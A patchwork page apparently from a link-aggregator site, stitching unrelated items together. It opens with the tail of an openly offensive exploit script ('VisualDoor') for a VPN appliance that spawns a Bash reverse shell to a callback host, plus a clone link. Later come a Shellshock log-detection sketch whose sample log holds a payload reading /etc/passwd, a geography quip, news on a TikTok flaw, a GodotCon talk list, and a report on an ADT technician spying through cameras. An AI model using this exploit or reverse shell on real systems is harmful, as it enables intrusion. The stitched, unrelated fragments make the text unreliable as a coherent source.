def pop_reverse_shell(target, cb_host, cb_port):
    print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
    backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
    execute_command(target=target, command=backconnect)

def hack_the_planet(target, cb_host, cb_port):
    if check_exploitable(target) == True:
        pass
    else:
        sys.exit("(-) Target not exploitable...")
    handlerthr = Thread(target=handler, args=(int(cb_port),))
    handlerthr.start()
    pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)

def main(args):
    banner()
    if len(args) != 4:
        sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))
    hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])

if __name__ == "__main__":
    main(args=sys.argv)

Download VisualDoor-main.zip or git clone https://github.com/darrenmartyn/VisualDoor.git
Source
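On the defensive side, the request described in the post above leaves a recognisable trace in web logs: a GET to /cgi-bin/jarrewrite.sh with a header value that starts with the Bash function-definition prefix `() {`. The detection sketch below is an added example, not part of the original post or of the VisualDoor project; it assumes the "combined" access-log format, and the log lines and IP addresses are constructed.

```python
import re

# "combined" access-log format: ip - user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:\\.|[^"\\])*)" "(?P<ua>(?:\\.|[^"\\])*)"$'
)
# Bash function-definition prefix used by Shellshock; spacing varies between tools.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
CGI_PATH = "/cgi-bin/jarrewrite.sh"  # endpoint named in the post

SAMPLE_LOG = [  # constructed lines using documentation IP ranges, not real traffic
    '198.51.100.7 - - [24/Jan/2021:10:01:02 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 200 1843 "-" "() { :; }; echo ; /bin/bash -c \'cat /etc/passwd\'"',
    '192.0.2.10 - - [24/Jan/2021:10:01:05 +0000] "GET /cgi-bin/welcome HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [24/Jan/2021:10:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 404 209 "() {  :;}; echo probe" "curl/7.68.0"',
    '192.0.2.10 - - [24/Jan/2021:10:03:00 +0000] "GET /cgi-bin/jarrewrite.sh?u=1 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Return one finding per request whose logged headers carry the Shellshock prefix."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if m is None:
            continue  # not combined format: skip rather than guess
        hit = [name for name in ("ua", "referer") if SHELLSHOCK_RE.search(m[name])]
        if not hit:
            continue
        path = m["path"].split("?", 1)[0]
        findings.append({
            "line": lineno,
            "src": m["ip"],
            "path": path,
            "status": int(m["status"]),
            "headers": hit,
            # the appliance endpoint from the post outranks a generic probe
            "severity": "high" if path == CGI_PATH else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Shellshock can be triggered through any request header that the CGI exports into the environment, so access logs that record only Referer and User-Agent will not show every attempt. Treat a hit as a reason to check the appliance's patch level, not as the only signal.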
-
You can't get from Africa <--> Romania in 2h
-
Flaw in popular video-sharing app left phone numbers and profile settings open to malicious activity.

[Image: TikTok has patched a vulnerability that left users open to having personal information scraped. Credit: Angela Lang/CNET]

A vulnerability identified in the popular video-sharing app TikTok exposed users to having personal information scraped from their profile, including their phone number and profile settings, security researchers at cybersecurity firm Check Point said Tuesday. That information could have been used to manipulate users' account details and build a database of TikTok users for malicious activity, researchers said.

The flaw in the app's Find Friends feature also exposed users' nicknames, profile and avatar pictures, and unique user IDs, Check Point said. There's no evidence that the vulnerability was ever exploited, and the flaw has reportedly been patched.

TikTok called security and privacy in its community its highest priority and thanked Check Point for bringing the vulnerability to its attention.

TikTok, which operates outside China but is owned by Chinese tech company ByteDance, has run into its share of controversy when it comes to the security of user data. A California user sued the company in 2019, alleging TikTok shares user data with the Chinese government. The US Army banned service members from using the app on government phones, after initially using the service for recruitment.

It's also not the first TikTok vulnerability discovered by TikTok. Earlier this month, researchers at the firm identified a series of software flaws in the app that opened the door to a range of attacks on users, including the sending of legitimate-looking text messages with links to malicious software and manipulating videos stored on the service.

Via cnet.com
-
Latte Art Simulator https://barist.art Author: Sunny Balasubramanian
-
Please use this platform to interact with speakers and other GodotCon attendees. Big thank you to Prehensile Tales (https://prehensile-tales.com/) for setting up and hosting this chat on behalf of the Godot project.

Content:
0:00:00 - Welcome talk - Rémi Verschelde
0:15:00 - WebXR in Godot - David Snopek
0:45:00 - (Almost) A Year of Fam Jams - Paul Gestwicki
1:15:00 - Visualizing Austria in Godot - Karl Bittner & Mathias Baumgartinger
1:45:00 - Authoritative Multiplayer with Godot - Stefan_Gamedev
2:15:00 - Teaching Godot Engine: Learning Experience Design - Gastón Caminiti
2:45:00 - Wwise Godot Integration: integrating audio middleware into Godot - Alessandro Famà & Jorge Garcia
3:15:00 - The Garden Path - Louis Durrant
3:26:10 - Godex: An ECS for Godot - Andrea Catania
3:38:00 - Dialog and system in visual novel Hauma - Senad Hrnjadovic
3:58:00 - The new rendering of Godot 4.0 - Juan Linietsky
4:15:00 - Godot apps on the Web: What's new, tricks, need to know - Fabio Alessandrelli
4:45:00 - Interacting with the Internet of Things for pleasure and profit - Julian Todd
5:15:00 - Godot for the Enterprise - Luke Dary
5:45:00 - Shader shenanigans - Paweł Fertyk
6:15:00 - Godot Wild Jam's story - Kati Baker
6:45:00 - Extending the 2D Renderer: Adding 3D-Like Shadowing - Pedro J. Estébanez
7:16:15 - Outro (2020 retrospective video, 2020 showcase video)

Source
-
Prosecutors said the technician accessed more than 200 customer CCTV systems on more than 9,600 occasions to spy on them getting naked and engaging in sexual activity.

[Image: Cyrus Crossan]

A Texas-based CCTV technician pleaded guilty this week to illegally accessing the security cameras of hundreds of families to watch people in their homes get naked and engage in sexual activities.

According to a criminal complaint [PDF], Telesforo Aviles, a 35-year-old, committed his crimes between November 2015 and March 2020 while working as a support technician for ADT, a provider of home security services.

Aviles's job involved installing home video surveillance cameras at customer premises and configuring the devices to work with the company's proprietary ADT Pulse app. But prosecutors said that Aviles strayed from company policy and started adding his personal email address to customers' ADT Pulse app during the installation and testing process.

Investigators said the technician usually targeted attractive women, and he used the backdoor account to access the camera's real-time video feed and spy on customers in intimate moments in their homes and with their partners.

The technician's scheme was discovered in January and February 2020 when several customers discovered Aviles' email address in their app's configuration panel and reported the incidents to ADT, which later referred the case to authorities.

Aviles was charged in April 2020 and pleaded guilty [PDF] this week, on Thursday. Prosecutors said Aviles accessed more than 200 customer CCTV systems on more than 9,600 occasions.

The former ADT technician now faces a sentence of up to five years in prison and a fine of up to $250,000, according to court documents. He was conditionally released earlier this week [PDF].

ADT notified its customers of the incident in April 2020. The New York Post reported at the time that the company tried to convince customers to sign a confidentiality agreement in exchange for a monetary payment so Aviles' actions wouldn't leak online. Their efforts didn't work, and the company is currently facing three class-action lawsuits [1, 2, 3] as a result of its former employee's actions.

Via zdnet.com